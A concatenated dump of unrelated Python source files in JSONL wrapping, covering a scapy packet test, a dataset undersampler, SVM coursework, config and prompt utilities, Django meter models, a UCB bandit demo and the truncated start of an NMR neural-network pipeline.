$LastChangedRevision: 4811 $\n\n:author: Ketan Mandke \n\n:copyright:\n Copyright 2009 The University of Texas at Austin\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n__docformat__ = \"restructuredtext en\"\n\nimport unittest\n\nfrom scapy.all import *\nfrom wins import *\nfrom copy import copy, deepcopy\n\nclass TestPacket(unittest.TestCase):\n\n def setUp(self):\n Trace.Global.reset()\n\n def not_test_001(self):\n p = Packet()\n h = Raw(\"helloworld\")\n h.setanno(\"x\", 100)\n r = TCP()/h\n s = TCP()/h\n s.setanno(\"x\", 50)\n r.setanno(\"foo\", s, ref=True)\n foo = r.getanno(\"foo\")\n self.assertFalse(isinstance(foo, Reference), \"setanno() error!\")\n self.assertTrue(foo==s,\"getanno() error!\")\n self.assertTrue(foo is s,\"getanno() error!\")\n t = copy(r)\n u = deepcopy(s)\n self.assertEqual(t._id, r._id, \"packet copy() error!\")\n self.assertEqual(u._id, s._id, \"packet deepcopy() error!\")\n self.assertFalse(t is r, \"packet copy() error!\")\n self.assertTrue(t == r, \"packet copy() error!\")\n self.assertFalse(u == s, \"packet deepcopy() error!\")\n\n def not_test_002(self):\n p = Packet()/\"helloworld\"\n q = Packet()/\"helloworld\"\n p.setanno(\"x\", q, ref=True)\n crcupdate(p)\n s = deepcopy(p)\n\n def test_crc(self):\n p = Packet()/\"helloworld\"\n crcupdate(p)\n p[CRC32].crcerror = 1\n\n","sub_path":"tests/qa_packet.py","file_name":"qa_packet.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"556403503","text":"from random import sample, shuffle\n\ndef parse_credits(filename=\"creditcard_discretised.csv\"):\n\tf = open(filename)\n\tattributes = f.readline().strip().split(\",\")\n\t\n\t#database = [[] for x in classes]\n\tdatabase = []\n\t\n\tmaxlines = float(\"inf\") # 10000 #\n\tfor line in f:\n\t\tline = line.strip().split(\",\")\n\t\tline = [int(x) for x in line]\n\t\t#for i, elem in enumerate(line):\n\t\t#\tdatabase[i].append(elem)\n\t\tdatabase.append(line)\n\t\t\n\t\tif(len(database[0])>=maxlines):\n\t\t\tbreak\n\tf.close()\n\treturn attributes,database\n\t\ndef export_credits(attributes,database,filename=\"creditcard_undersampled.csv\"):\n\t\n\tf = open(filename,\"w\")\n\tf.write(\",\".join((x for x in attributes)))\n\tf.write(\"\\n\")\n\tfor line in database:\n\t\tf.write(\" ,\".join(str(int(x)) for x in line))\n\t\tf.write(\"\\n\")\n\t\t\n\t\n\ndef resample(attributes,database,target):\n\t\"\"\"Undersampling \n\thttps://www.kaggle.com/arathee2/achieving-100-accuracy\n\thttps://www.kaggle.com/joparga3/in-depth-skewed-data-classif-93-recall-acc-now\n\t\"\"\"\n\ttarget_index = attributes.index(target)\n\tpositive = []\n\tnegative = []\n\tfor line in database:\n\t\tif(line)[target_index]==1:\n\t\t\tpositive.append(line)\n\t\telse:\n\t\t\tnegative.append(line)\n\tprint(\"Pos:\",len(positive))\n\tprint(\"Neg:\",len(negative))\n\tnegative_undersampled = sample(negative,len(positive))\n\tlines = []\n\tproblems = 0\n\tfor line in negative:\n\t\tfor lane in positive:\n\t\t\tif(line[:target_index]+line[target_index:] == lane[:target_index]+lane[target_index:]):\n\t\t\t\tif(line not in lines):\n\t\t\t\t\tprint(\"Ligne à problème:\\n\",database.index(line),line,\"\\n\",database.index(lane),lane)\n\t\t\t\t\tlines.append(line)\n\t\t\t\tproblems+=1\n\tprint(\"Problèmes:\",len(lines))\n\tprint(\"Lignes à problèmes:\",problems)\n\tdatabase = negative_undersampled+positive\n\tshuffle(database)\n\tprint(\"Und:\",len(database))\n\treturn database\n\natt,dat = parse_credits()\ndat=resample(att,dat, \"Class\")\nexport_credits(att,dat)\n","sub_path":"Parse_big_data/parse_discrete_to_undersample.py","file_name":"parse_discrete_to_undersample.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"84895805","text":"import sys\nimport numpy as np\nimport cvxopt\nfrom cvxopt import matrix\nimport csv\nimport time\nimport sklearn.metrics\n\ntrain_file = sys.argv[1]\ntest_file = sys.argv[2]\nbinary_multi = sys.argv[3]\npart_num = sys.argv[4]\n\n# Constants\nd1 = 3\nd2 = (d1+1)%10\nn = 28*28\nC = 1.0\nm = 0\nEPS = 1e-5\ngamma = 0.05\n\ndef read_input(file):\n\t# input\n\tx = []\n\ty = []\n\twith open(file, 'r') as csvfile:\n\t\treader = csv.reader(csvfile)\n\n\t\tlimit = 0\n\t\tfor row in reader:\n\t\t\tlimit += 1\n\n\t\t\t# -------- debug ----------\n\t\t\t# if limit == 100:\n\t\t\t# \tbreak\n\t\t\t# -------------------------\n\n\t\t\tlabel = int(row[n])\n\t\t\tif (label == d1 or label == d2):\n\t\t\t\ty.append(1 if label == d1 else -1)\n\t\t\t\txl = []\n\t\t\t\tfor i in range(n):\n\t\t\t\t\txl.append(float(row[i]) / 255.0)\n\t\t\t\tx.append(xl)\n\tx = np.array(x)\n\ty = np.array(y)\n\treturn (x,y)\n\ndef gauss_K(x,z):\n\tnorm = np.linalg.norm(x-z)\n\treturn np.exp(-gamma * norm * norm)\n\ndef gaussian_kernal(x):\n\treturn np.asarray([ [ gauss_K(i,j) for j in x ] for i in x ])\n\t# return sklearn.metrics.pairwise.rbf_kernel(x, Y=None, gamma=gamma)\n\ndef find_matrices(x,y,C,part_num):\n\t# print(x.shape, y.shape, C)\n\tA = matrix(y.T, tc='d')\n\tb = matrix(0.0)\n\t\n\ti_ar = np.identity(m)\n\tG = matrix(np.concatenate((i_ar,-i_ar), axis=0), tc='d')\n\t\n\th_ar = np.zeros(2*m)\n\th_ar[0:m] = C\n\th = matrix(h_ar, tc='d')\n\t\n\tq = matrix(-np.ones(m), tc='d')\n\n\tif part_num == 0:\n\t\tP = matrix(np.multiply(x @ x.T, y @ y.T), tc='d')\n\telse:\n\t\tP = matrix(np.multiply(gaussian_kernal(x), y @ y.T), tc='d')\n\t\n\t# print(P.size, q.size, G.size, h.size, A.size, b.size)\n\treturn (P,q,G,h,A,b)\n\n\n# ------------ part_a -----------------------\n\ndef part_a():\n\t# ------------- training: ---------------\n\tstart_time = time.time()\n\n\t(x,y) = read_input(train_file)\n\ty = y[:,np.newaxis]\n\tglobal m\n\tm = y.shape[0]\n\t(P,q,G,h,A,b) = find_matrices(x,y,C,0)\n\tcvxopt.solvers.options['show_progress'] = False\n\tsol = cvxopt.solvers.qp(P,q,G,h,A,b)\n\talpha = sol['x']\n\tsv_cnt = 0\n\tone_sv = -1\n\tw = np.zeros((n,1))\n\t# List of indices of support vectors\n\tInd_SV = [index for index, ele in enumerate(alpha) if ele > EPS]\n\tsv_cnt = len(Ind_SV)\n\n\tfor i in Ind_SV:\n\t\tx_i = x[i].T.reshape((n,1))\n\t\tw += alpha[i] * y[i] * x_i\n\t\tif (alpha[i] < C - EPS):\n\t\t\tone_sv = i\n\t\t\t\n\tif(one_sv == -1):\n\t\tprint(\"Error!\")\n\n\tprint(\"Number of Support Vectors:\",sv_cnt)\n\t# print(\"Support Vectors:\", Ind_SV)\n\tb = y[one_sv] - w.T @ x[one_sv]\n\tprint(\"Bias:\",b)\n\t# print(\"Weights:\",w)\n\n\tend_time = time.time()\n\tprint(\"Training time:\", end_time - start_time)\n\n\t# ------------- testing: ---------------\n\tcorrect_pred_cnt = 0\n\t(x_test,y_test) = read_input(test_file)\n\n\ty_pred = np.zeros(y_test.shape)\n\n\tfor i in range(y_test.shape[0]):\n\t\ty_pred[i] = 1 if w.T @ x_test[i] + b > 0 else -1\n\t\tif(y_pred[i] == y_test[i]):\n\t\t\tcorrect_pred_cnt += 1\n\n\tprint(\"accuracy:\", 100.0 * (correct_pred_cnt / y_test.shape[0]))\n\n\n# ------------ part_b -----------------------\n\ndef part_b():\n\t# ------------- training: ---------------\n\tstart_time = time.time()\n\n\t(x,y) = read_input(train_file)\n\ty = y[:,np.newaxis]\n\tglobal m\n\tm = y.shape[0]\n\n\t(P,q,G,h,A,b) = find_matrices(x,y,C,1)\n\tcvxopt.solvers.options['show_progress'] = False\n\tsol = cvxopt.solvers.qp(P,q,G,h,A,b)\n\talpha = sol['x']\n\talpha = np.array(alpha)\n\t\n\t# Saving alpha:\n\t# alnp = np.array(alpha)\n\t# np.save(\"save\", alnp)\n\t\n\t# Loading alpha:\n\t# alpha = np.load(\"save.npy\")\n\n\tsv_cnt = 0\n\tone_sv = -1\n\t# print(\"m:\",m)\n\t# print(alpha)\n\n\t# List of indices of support vectors\n\tInd_SV = [index for index, ele in enumerate(alpha) if ele > EPS]\n\tsv_cnt = len(Ind_SV)\n\n\tprint(\"Number of Support Vectors:\",sv_cnt)\n\t# Finding one SV with 0 < alpha < C\n\tfor i in Ind_SV:\n\t\tif (alpha[i] < C - EPS):\n\t\t\tone_sv = i\n\t\t\tbreak\n\n\tif(one_sv == -1):\n\t\tprint(\"Error!\")\n\n\tb = float(y[one_sv])\n\tfor i in Ind_SV:\n\t\tb -= alpha[i][0] * y[i][0] * gauss_K(x[i], x[one_sv])\n\tprint(\"Bias:\",b)\n\t# print(\"Indices of Support Vectors:\",Ind_SV)\n\t# Finding x,y,alpha for indices of Support Vectors\n\txSV = x[Ind_SV,:]\n\tySV = y[Ind_SV,:]\n\talphaSV = alpha[Ind_SV,:]\n\n\tend_time = time.time()\n\tprint(\"Training Time:\", end_time - start_time)\n\n\t# ------------- testing: ---------------\n\tcorrect_pred_cnt = 0\n\t(x_test,y_test) = read_input(test_file)\n\n\t# using sk-learn gaussian\n\tMAT = sklearn.metrics.pairwise.rbf_kernel(x_test, Y=xSV, gamma=gamma)\n\tvec = np.multiply(alphaSV[:,0], ySV[:,0])\n\tMAT[:,] = np.multiply(MAT[:,], vec)\n\tAmt = np.sum(MAT, axis = 1) + b\n\ty_pred = np.where(Amt > 0, 1, -1)\n\tcorrect_pred_cnt = sum(y_pred == y_test)\n\n\t# without sk-learn gaussian\n\t# print(alphaSV.shape, ySV.shape)\n\tAmt = np.sum(np.asarray([ [ alphaSV[j][0] * ySV[j][0] * gauss_K(xSV[j], x_test[i]) for j in range(xSV.shape[0])] for i in range(x_test.shape[0])]), axis = 1) + b\n\tprint(Amt.shape)\n\ty_pred = np.where(Amt > 0, 1, -1)\n\tcorrect_pred_cnt = sum(y_pred == y_test)\n\n\t# print(y_test.shape[0], correct_pred_cnt)\n\tprint(\"accuracy:\", 100.0 * (correct_pred_cnt / y_test.shape[0]))\n\n\n# ------------ part_c -----------------------\nfrom svmutil import *\n\ndef part_c1():\n\t# ------------- LINEAR ------------------\n\t# ------------- training: ---------------\n\tstart_time = time.time()\n\n\t(x,y) = read_input(train_file)\n\tglobal m\n\tm = y.shape[0]\n\tprob = svm_problem(y, x)\n\tparam = svm_parameter('-t 0 -c 1.0 -q')\n\tmodel = svm_train(prob, param)\n\t\n\talpha = np.asarray(model.get_sv_coef())\n\talpha = alpha[:,0]\n\tInd_SV = np.asarray(model.get_sv_indices()) - 1\n\n\tsv_cnt = len(Ind_SV)\n\tprint(\"Number of Support Vectors:\",sv_cnt)\n\n\t# -----------finding b and w---------------\n\tw = np.zeros((n,1))\n\tj = 0\n\tfor i in Ind_SV:\n\t\tx_i = x[i].T.reshape((n,1))\n\t\tw += alpha[j] * y[i] * x_i\n\t\tif (alpha[j] < C - EPS):\n\t\t\tone_sv = i\n\t\tj+=1\n\t\t\t\n\tif(one_sv == -1):\n\t\tprint(\"Error!\")\n\n\t# print(\"Indices of Support Vectors:\",Ind_SV)\n\tb = y[one_sv] - w.T @ x[one_sv]\n\t# print(\"Bias:\",b)\n\t# print(\"Weights:\",w)\n\n\tend_time = time.time()\n\tprint(\"Training Time:\", end_time - start_time)\n\n\t# ------------- testing: ---------------\n\t(x_test,y_test) = read_input(test_file)\n\tp_label,_,_ = svm_predict(y_test, x_test, model, '-q')\n\tACC,_,_ = evaluations(y_test, p_label)\n\n\tprint(\"Accuracy:\", ACC)\n\n\ndef part_c2():\n\t# ------------- GAUSSIAN ------------------\n\t# ------------- training: ---------------\n\tstart_time = time.time()\n\n\t(x,y) = read_input(train_file)\n\tglobal m\n\tm = y.shape[0]\n\tprob = svm_problem(y, x)\n\tparam = svm_parameter('-t 2 -c 1.0 -g 0.05 -q')\n\tmodel = svm_train(prob, param)\n\n\talpha = np.asarray(model.get_sv_coef())\n\talpha = alpha[:,0]\n\tInd_SV = np.asarray(model.get_sv_indices()) - 1\n\n\tsv_cnt = len(Ind_SV)\n\tprint(\"Number of Support Vectors:\",sv_cnt)\t\n\t# np.set_printoptions(threshold=np.nan)\n\t# print(\"Indices of Support Vectors:\",Ind_SV)\n\n\t# ------------- finding b: --------------\n\n\tfor i in range(len(Ind_SV)):\n\t\tif (alpha[i] < C - EPS):\n\t\t\tone_sv = i\n\t\t\tbreak\n\n\tb = float(y[one_sv])\n\tj = 0\n\tfor i in Ind_SV:\n\t\tb -= alpha[j] * y[i] * gauss_K(x[i], x[one_sv])\n\t\tj += 1\n\t\n\t# print(\"Bias:\",b)\n\n\tend_time = time.time()\n\tprint(\"Training Time:\", end_time - start_time)\n\n\t# ------------- testing: ---------------\n\t(x_test,y_test) = read_input(test_file)\n\tp_label,_,_ = svm_predict(y_test, x_test, model, '-q')\n\tACC,_,_ = evaluations(y_test, p_label)\n\n\tprint(\"Accuracy:\", ACC)\n\n# setting print option to a fixed precision\nnp.set_printoptions(precision = 6, suppress = True)\n\nif part_num == 'a':\n\t# start_time = time.time()\n\tpart_a()\n\t# end_time = time.time()\n\t# print(\"Time taken:\", end_time - start_time)\n\nelif part_num == 'b':\n\t# start_time = time.time()\n\tpart_b()\n\t# end_time = time.time()\n\t# print(\"Time taken:\", end_time - start_time)\n\t\nelif part_num == 'c':\n\tprint(\"LibSVM - LINEAR:\")\n\t# start_time = time.time()\n\tpart_c1()\n\t# end_time = time.time()\n\t# print(\"Time taken:\", end_time - start_time, \"\\n\")\n\t\n\tprint(\"LibSVM - GAUSSIAN:\")\n\t# start_time = time.time()\n\tpart_c2()\n\t# end_time = time.time()\n\t# print(\"Time taken:\", end_time - start_time)\n\t\n# ./run.sh 2 \n# Here, 'binary_or_multi_class' is 0 for binary classification and 1 for multi-class. \n# 'part_num' is part number which can be a-c for binary classification and a-d for multi-class.","sub_path":"A2/Submission/2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"58665130","text":"# config module\\\\\\\\\\\\# for strxfrm sort\nimport pathlib\nfrom pathlib import Path\nimport json\nfrom abc import ABC, abstractmethod\nfrom .error import ConfigError\nimport logging\n\nlogger = logging.getLogger(__name__)\nconfig_filename = 'keeper-config.json'\n__logging_format__ = \"%(levelname)s: %(message)s by %(module)s.%(funcName)s in %(fileName)s:%(lineno) at %(asctime)s\"\n\n\nclass Config(ABC):\n pass\n\n\nclass Logging(Config):\n level = logging.INFO\n format = \"%(levelname)s: %(message)s by %(module)s.%(funcName)s in %(fileName)s:%(lineno)d at %(asctime)s\"\n #path = '.'\n #filename = 'keeper.log'\n\n def __init__(self, **logging_dict):\n '''Set logging.'level', 'format', 'path', 'filename'\n '''\n sets = {}\n logging_keys = {'level', 'format', 'path', 'filename'}\n for key in logging_keys:\n value = logging_dict.get(key)\n if value:\n level_set = {'DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'}\n if key == 'level' and value not in level_set:\n raise ConfigError(f\"'level' must be in {level_set}\")\n sets[key] = value\n self.config = sets\n return sets\n \n def start(self):\n '''basicConfig starts \n '''\n # fullpath = Path(cls.path) / cls.filename\n # rfHandler = handlers.RotatingFileHandler(fullpath, maxBytes=32768, backupCount=1)\n # cls.formatter = logging.Formatter(cls.format)\n # rfHandler.setFormatter(cls.formatter)\n logging.basicConfig(**self.config) # handlers=[logging.StreamHandler()], \n # logging.info(f\"Logging.basicConfig is set: level={cls.level}, format={cls.formatter.format}, handlers={cls.handlers}.\")\n # return cls.handlers\n\n\nclass Locale(Config):\n LC = 'en_US'\n ENCODING = 'utf8'\n\n def __init__(self, code):\n cl = locale.getlocale()\n lc = code.split('.')[0]\n if lc in locale.locale_aliases().keys():\n self.lc = lc\n else:\n raise ConfigError(\"{lc} is not in the alias list.\")\n\n def start(self):\n locale.setlocale(locale.LC_ALL, '.'.join([self.lc, Locale.ENCODING]))\n\n \n\npager = None\n\nkey_Dict_config_class = {'logging': Logging, 'locale': Locale}\n\n\ndef set_by_json_file(config_filename=config_filename):\n pth = Path(config_filename)\n if pth.exists():\n try: # pick up keys from config.json file\n with open(config_filename) as config_file:\n config_dict = json.load(config_file)\n config_sets = {}\n for k, cls in key_Dict_config_class.items():\n if k in config_dict.keys():\n config_sets[k] = cls(config_dict[k])\n return config_sets\n except json.JSONDecodeError as err: # msg, doc, pos:\n emsg = f\"Error: Unable to parse: {err.doc} ; at {err.pos} ; in JSON file: {config_filename}\"\n logging.error(f\"msg:{err.msg}, doc:{err.doc}, pos:{err.pos}. {emsg}\")\n from .error import DecodeError\n raise ConfigError(emsg) from json.JSONDecodeError\n except OSError as e:\n msg = f\"{e.strerror}: Error: Unable to access config file: {config_filename}\"\n logging.error(msg)\n from .error import OSException\n raise ConfigError(msg) from OSError\n except Exception:\n logging.exception('Unknown exception happend.')\n raise\n\n\ndef start(config_set):\n for obj in config_set:\n obj.start()\n ","sub_path":"keepercommander/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"580574014","text":"from typing import Callable, Dict, Any, List, Optional\n\nimport errors\nfrom cogs import errorhandler\nfrom bot import commands, in_prompt\n\n\nclass Stage:\n def __init__(self, func: Callable, handler: Callable, context: commands.Context, stage_num: int = 0):\n self.callback: Callable = func\n self.handler: Callable = handler\n self.ctx: commands.Context = context\n self.branch: str = ''\n self.num: int = stage_num\n self.history: List[int] = [stage_num]\n self.results: Dict[str, Any] = {}\n\n @property\n def path(self):\n return self.branch + str(self.num)\n\n @path.setter\n def path(self, value: str):\n i = value.rfind('.')\n self.branch = value[0:i]\n self.num = int(value[(i + 1):-1])\n\n async def zap(self, stage_num: int, *args, progress_history: bool = True, **kwargs):\n self.num = stage_num\n if progress_history:\n self.history.append(self.num)\n try:\n return (await self.callback(self, *args, **kwargs)) or self.num\n except errors.PromptKilled:\n raise\n except errors.PromptError as e:\n await self.handler(self.ctx, e)\n\n async def to(self, branch: str, stage_num: int = 0, *args, **kwargs):\n self.branch = branch\n return await self.zap(stage_num, *args, **kwargs)\n\n async def back(self, *args, **kwargs):\n self.history.pop(-1)\n await self.zap(self.history[-1], *args, progress_history=False, **kwargs)\n\n async def next(self, increment: Optional[int] = 1, *args, **kwargs):\n await self.zap(self.num + increment, *args, **kwargs)\n\n\ndef prompt(handler=errorhandler.process) -> Callable:\n def decorator(func) -> Callable:\n async def new_func(ctx: commands.Context, *args, stage_num: int = 0, **kwargs):\n try:\n return await func(Stage(func, handler, ctx, stage_num), *args, **kwargs)\n except errors.PromptKilled as e:\n raise e\n except errors.PromptError as e:\n await handler(ctx, e)\n finally:\n in_prompt.pop(ctx.author.id)\n return new_func\n return decorator\n","sub_path":"utils/prompt.py","file_name":"prompt.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"222380480","text":"import os\nimport logging\nimport re\n\nfrom colorama import Fore, init\nfrom configparser import ConfigParser, NoSectionError, NoOptionError\n\n\ninit()\n\n\nclass OptionError(Exception):\n \"\"\"Option error.\"\"\"\n\n\nclass Options:\n _LOADED = False\n _CONFIG_PATH = os.path.normpath(os.path.join(os.path.expanduser('~'), 'vcd-config.ini'))\n\n PRODUCTION = False\n FILENAME_PATTERN = re.compile(\n 'filename=\\\"?([\\w\\s\\-\\!\\$\\?\\%\\^\\&\\(\\)\\_\\+\\~\\=\\`\\{\\}\\[\\]\\.\\;\\'\\,]+)\\\"?')\n ROOT_FOLDER = os.path.normpath(\n os.path.join(os.path.dirname(os.path.dirname(__file__)), 'default_root_folder'))\n\n LOGS_FOLDER = os.path.normpath(os.path.join(os.path.expanduser('~'), 'logs'))\n LOG_PATH = os.path.normpath(os.path.join(LOGS_FOLDER, 'vcd.log'))\n TIMEOUT = 30\n LOGGING_LEVEL = logging.DEBUG\n\n FORUMS_SUBFOLDERS = True\n\n # Creators\n\n @staticmethod\n def create_root_folder():\n if os.path.isdir(Options.ROOT_FOLDER) is False:\n os.makedirs(Options.ROOT_FOLDER)\n\n @staticmethod\n def create_logs_folder():\n if os.path.isdir(Options.LOGS_FOLDER) is False:\n os.makedirs(Options.LOGS_FOLDER)\n\n # Setters\n\n @staticmethod\n def set_logs_folder(logs_folder):\n Options.LOGS_FOLDER = logs_folder\n Options.create_logs_folder()\n\n @staticmethod\n def set_root_folder(root_folder):\n Options.ROOT_FOLDER = root_folder\n Options.create_root_folder()\n\n @staticmethod\n def set_timeout(timeout: int):\n Options.TIMEOUT = int(timeout)\n\n @staticmethod\n def set_logging_level(logging_level):\n logging_level = logging.getLevelName(logging_level.upper())\n if not isinstance(logging_level, int):\n raise ValueError(f'Invalid log level: {logging_level!r}')\n\n Options.LOGGING_LEVEL = logging_level\n\n @staticmethod\n def set_forums_subfolders(forums_subfolders):\n if not isinstance(forums_subfolders, bool):\n raise TypeError(\n f'forums_subfolders must be bool, not {type(forums_subfolders).__name__}')\n\n Options.FORUMS_SUBFOLDERS = forums_subfolders\n\n @staticmethod\n def load_config():\n if Options._LOADED:\n return\n\n Options._LOADED = True\n config = ConfigParser()\n config.read(Options._CONFIG_PATH)\n try:\n Options.set_root_folder(config.get('options', 'root_folder'))\n Options.set_timeout(config.get('options', 'timeout'))\n Options.set_logs_folder(config.get('options', 'log_folder'))\n Options.set_logging_level(config.get('options', 'logging_level'))\n Options.set_forums_subfolders(config.getboolean('options', 'forums_subfolders'))\n\n except (NoSectionError, NoOptionError):\n config['options'] = {\n 'root_folder': Options.ROOT_FOLDER,\n 'timeout': '30', 'log_folder': Options.LOGS_FOLDER,\n 'logging_level': logging.getLevelName(Options.LOGGING_LEVEL),\n 'forums_subfolders': Options.FORUMS_SUBFOLDERS\n }\n with open(Options._CONFIG_PATH, 'wt', encoding='utf-8') as fh:\n config.write(fh)\n\n return exit(Fore.RED + 'Invalid Options' + Fore.RESET)\n\n\nOptions.load_config()\nOptions.create_root_folder()\n","sub_path":"vcd/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"132682889","text":"from django.db import models\nfrom datetime import date\nimport pandas as pd\n\nclass ResourceType(models.Model):\n name = models.CharField(max_length=32, blank=False, null=False)\n\n def __str__(self):\n return \"{}\".format(self.name)\n\n class Meta:\n verbose_name = \"Resource type\"\n verbose_name_plural = \"Resource types\"\n\n\nclass Meters(models.Model):\n name = models.CharField(max_length=64, unique=True, blank=False, null=False)\n resource_type = models.ForeignKey(ResourceType, null=True, on_delete=models.SET_NULL)\n unit = models.CharField(max_length=10, blank=False, null=False)\n\n def __str__(self):\n return \"{}\".format(self.name)\n\n def get_absolute_url(self):\n return \"/meters/{}\".format(self.id)\n\n def get_last_reading(self):\n \"\"\" Return list of last reading data - record, date, consumption\"\"\"\n return Records.objects.filter(meter__id=self.id).last()\n\n def consumptions_recalculation(self, start_date=date(1970,1,1)):\n \"\"\" Function which perform recalculation of consuptions\n for records where date >= instance.date \"\"\"\n\n records_list = Records.objects.filter(meter__id=self.id,\n date__gte=start_date).order_by('date')\n try:\n last_record = Records.objects.filter(date__lt=start_date).order_by('date').last().record\n except:\n last_record = 0\n\n obj_list = []\n for record in records_list:\n if last_record == 0:\n last_record = record.record\n record.consumption = record.record - last_record\n last_record = record.record\n obj_list.append(record)\n\n Records.objects.filter(date__in=records_list.values_list('date', flat=True)).delete() # delete previous records\n Records.objects.bulk_create(obj_list) # create multiple object in one call to DB\n\n def import_readings(self, readings_table): #records_table - pandas DataFrame\n readings_table = readings_table.fillna(0) # replace NaN with 0\n obj_list = []\n\n for index, row in readings_table.iterrows():\n obj_list.append(Records(meter=self,\n date=row.DATE,\n record=row.VALUE,\n consumption=0))\n\n Records.objects.filter(date__in=readings_table.DATE.tolist()).delete() # delete previous records\n Records.objects.bulk_create(obj_list) # create multiple object in one call to DB\n self.consumptions_recalculation(readings_table.DATE.min())\n\n\n # readings_table = readings_table.sort_values(by=['DATE'], ascending=True) # Sorting values by date (ascending)\n # readings_table['CONSUMPTION'] = readings_table['VALUE'].diff() # Performing of calculation consumptions\n\n class Meta:\n verbose_name = \"Meter\"\n verbose_name_plural = \"Meters\"\n\n\nclass Records(models.Model):\n meter = models.ForeignKey(Meters, null=True, on_delete=models.SET_NULL)\n date = models.DateField(blank=False, null=False)\n record = models.FloatField(default=0)\n consumption = models.FloatField(default=0)\n\n\n class Meta:\n ordering = ['date']\n get_latest_by = 'date'\n\n\n\n\n\n\n","sub_path":"django_meters/meters/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"229754948","text":"\n\n#calss header\nclass _CENSOR():\n\tdef __init__(self,): \n\t\tself.name = \"CENSOR\"\n\t\tself.definitions = [u'to remove anything offensive from books, films, etc., or to remove parts considered unsuitable from private letters, especially ones sent during war or from a prison: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_censor.py","file_name":"_censor.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"241616027","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 12 11:05:32 2020\n\n@author: guillem\n\"\"\"\n\n# UPPER CONFIDENCE BOUND (UCB)\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Cargamos el Dataset\n\ndf = pd.read_csv(\"/home/guillem/CursosML/machinelearning-az-master/datasets/Part 6 - Reinforcement Learning/Section 32 - Upper Confidence Bound (UCB)/Ads_CTR_Optimisation.csv\")\n\n# Implementamos una selección aleatoria\nimport random\nN = 10000\nd = 10\nads_selected = []\ntotal_reward = 0\nfor n in range(0, N):\n ad = random.randrange(d)\n ads_selected.append(ad)\n reward = df.values[n, ad]\n total_reward = total_reward + reward\n \n# Visualizamos un histograma de los resultados\n\nplt.subplots(1, 1, figsize = (10 , 10))\nplt.hist(ads_selected)\nplt.title(\"Histograma de los anuncios seleccionados\")\nplt.xlablel(\"Anuncios\")\nplt.ylabel(\"Numero de veces que ha sido seleccionado\")\nplt.show()\n\n# Vamos intentar superar el baseline de arriba\n\n# Algoritmo de upper confidence bound\nN = df.shape[0]\nd = df.shape[1]\n\nnum_selection = [0] * d\nsum_rewards = [0] * d\nads_selected = []\ntotal_reward = 0\nfor n in range(0, N):\n max_upper_bound = 0\n ad = 0\n for i in range(0, d):\n if(num_selection[i] > 0):\n average_reward = sum_rewards[i]/num_selection[i]\n delta_i = np.sqrt(3/2*np.log(n+1)/num_selection[i])\n upper_bound = average_reward + delta_i\n \n else:\n upper_bound = 1e400\n \n if upper_bound > max_upper_bound:\n max_upper_bound = upper_bound\n ad = i\n ads_selected.append(ad)\n num_selection[ad] = num_selection[ad] + 1\n reward = df.values[n, ad]\n sum_rewards[ad] = sum_rewards[ad] + reward\n total_reward = total_reward + reward\n \n \n# Visualizamos con un histograma\nplt.subplots(1, 1, figsize = (10, 10))\nplt.hist(ads_selected)\nplt.title(\"Histograma de anuncios\")\nplt.xlabel(\"ID del Anuncio\")\nplt.ylabel(\"Frecuencia de visualización del anuncio\")\nplt.show()","sub_path":"UpperConfidenceBound.py","file_name":"UpperConfidenceBound.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"410429823","text":"import numpy as np\nimport pickle\nimport pandas as pd\nfrom ruffus import * \nfrom tqdm import tqdm\nfrom rdkit import Chem\nimport pickle\nimport os\n\nfrom glob import glob\nimport json \n\nimport time\nimport util\nimport nets\n\nfrom rdkit.Chem import AllChem\nfrom rdkit.Chem import rdMolDescriptors as rdMD\n\nimport torch\nfrom torch import nn\nfrom tensorboardX import SummaryWriter\n\nfrom tqdm import tqdm\nfrom netdataio import * \nimport netdataio\nimport itertools\nimport graph_conv_many_nuc_util\nfrom graph_conv_many_nuc_util import move\n\nDATASET_DIR = \"../../data/RPNMRData/graph_conv_many_nuc_pipeline.datasets\"\n\ntd = lambda x : os.path.join(DATASET_DIR, x)\n\n\nSPECT_SET = '13C' # or '13C'\n\nTENSORBOARD_DIR = f\"logs.{SPECT_SET}\"\n\nCHECKPOINT_DIR = \"checkpoints\" \nMAT_PROPS= 'aromatic'\nDATASET_NAME = 'nmrshiftdb_hconfspcl_nmrshiftdb'\n#DATASET_NAME = 